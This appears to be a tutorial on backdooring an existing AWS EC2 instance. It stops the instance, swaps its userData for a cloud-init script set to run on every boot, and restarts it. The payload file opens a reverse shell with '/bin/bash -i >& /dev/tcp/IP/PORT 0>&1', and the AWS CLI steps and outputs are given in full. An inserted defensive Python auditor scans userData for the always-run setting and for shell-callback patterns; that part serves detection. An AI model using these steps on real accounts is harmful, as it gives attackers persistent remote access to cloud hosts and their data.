Launching a new EC2 instance to host a reverse shell is not always a good idea; for one thing, a freshly launched instance is easy to spot.
Using an existing instance
Required permissions:
- ec2:DescribeInstances
- ec2:ModifyInstanceAttribute
(The stop and start steps below additionally need ec2:StopInstances and ec2:StartInstances.)
First, stop the EC2 instance: the userData attribute cannot be modified while the instance is running.
```shell
> aws ec2 stop-instances --instance-ids {EC2_INSTANCE_ID}
```
Output if the instance has not been stopped
```text
An error occurred (IncorrectInstanceState) when calling the ModifyInstanceAttribute operation: The instance 'i-XXXXXXXXXXXX' is not in the 'stopped' state.
```
Output after a successful stop
```json
{
    "StoppingInstances": [
        {
            "CurrentState": {
                "Code": 64,
                "Name": "stopping"
            },
            "InstanceId": "i-XXXXXXXXXXXX",
            "PreviousState": {
                "Code": 16,
                "Name": "running"
            }
        }
    ]
}
```
Build blackdoor.sh
```text
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
echo "Hello World" >> /home/ubuntu/hello.txt # this line is only a test
/bin/bash -i >& /dev/tcp/IP/PORT 0>&1 # reverse shell example
--//--
```
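The defender's counterpart to the file above, added here as an example (not code from the original post): a script that takes the user data an instance currently carries, splits the cloud-init MIME multipart, and flags the two things this technique depends on, the `[scripts-user, always]` setting (which makes cloud-init re-run the script on every boot instead of only the first one) and callback-style commands in the shell part. It assumes the user data was fetched with `aws ec2 describe-instance-attribute --instance-id <id> --attribute userData --query UserData.Value --output text`; the sample user data embedded below is constructed so the script runs offline.

```python
"""Audit an EC2 instance's user data for persistent boot scripts.

Added example, not code from the original post. Input is the base64 value that
`aws ec2 describe-instance-attribute --attribute userData` returns.
"""
import base64
import email
import re
from email import policy

# Constructed sample: the same MIME layout the post builds.
SAMPLE_USER_DATA = b"""Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
/bin/bash -i >& /dev/tcp/IP/PORT 0>&1
--//--
"""
# What describe-instance-attribute actually hands back: base64 of the above.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_USER_DATA).decode()

# Constructed benign sample: a plain first-boot script without a MIME wrapper.
BENIGN_USER_DATA = b"#!/bin/bash\napt-get update -y\n"

# cloud-config directive that turns a one-time script into an every-boot one.
ALWAYS_RUN = re.compile(r"\[\s*scripts-user\s*,\s*always\s*\]")
# Patterns in a boot script that deserve a human look; extend to taste.
SUSPICIOUS = [r"/dev/tcp/", r"bash\s+-i", r"curl[^\n|]*\|\s*(ba)?sh", r"\bnc\b[^\n]*-e"]


def decode_user_data(value: str) -> bytes:
    """UserData.Value from describe-instance-attribute is base64-encoded."""
    return base64.b64decode(value)


def split_user_data(raw: bytes) -> list:
    """Return (content_type, body) for each cloud-init part.

    cloud-init also accepts a bare script or a bare #cloud-config document;
    those two forms are returned as a single part.
    """
    head = raw.lstrip()
    if head.lower().startswith(b"content-type: multipart"):
        msg = email.message_from_bytes(raw, policy=policy.default)
        return [(p.get_content_type(), p.get_content()) for p in msg.iter_parts()]
    text = raw.decode("utf-8", "replace")
    if head.startswith(b"#cloud-config"):
        return [("text/cloud-config", text)]
    return [("text/x-shellscript", text)]


def audit_user_data(raw: bytes) -> dict:
    """Summarise what the user data would do at boot and whether to review it."""
    findings = {"always_run": False, "script_parts": 0, "indicators": []}
    for ctype, body in split_user_data(raw):
        if ctype == "text/cloud-config" and ALWAYS_RUN.search(body):
            findings["always_run"] = True
        elif ctype == "text/x-shellscript":
            findings["script_parts"] += 1
            findings["indicators"] += [p for p in SUSPICIOUS if re.search(p, body)]
    findings["verdict"] = "REVIEW" if findings["always_run"] or findings["indicators"] else "ok"
    return findings


if __name__ == "__main__":
    print(audit_user_data(decode_user_data(SAMPLE_ENCODED)))
    print(audit_user_data(BENIGN_USER_DATA))
```

Run it over `describe-instance-attribute` output for every instance in an account and anything that comes back `REVIEW` is worth a look, since legitimate first-boot provisioning rarely needs `always` and almost never opens `/dev/tcp/`.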
base64 encode
```shell
> base64 -i blackdoor.sh > blackdoor_encoded.sh # macOS syntax; GNU coreutils base64 has no -i, use `base64 -w0 blackdoor.sh` there
```
Modify instance attribute
```shell
> aws ec2 modify-instance-attribute \
    --instance-id i-XXXXXXXXXXXX \
    --attribute userData \
    --value file://blackdoor_encoded.sh
```
Start EC2 instance
```shell
> aws ec2 start-instances --instance-ids i-09d20a0b2b49d77cc
```
Output
```json
{
    "StartingInstances": [
        {
            "CurrentState": {
                "Code": 0,
                "Name": "pending"
            },
            "InstanceId": "i-XXXXXXXXXX",
            "PreviousState": {
                "Code": 80,
                "Name": "stopped"
            }
        }
    ]
}
```
Once the state is running (shown as 執行中 in the localized console), log in to the instance and check /var/log/cloud-init-output.log for errors.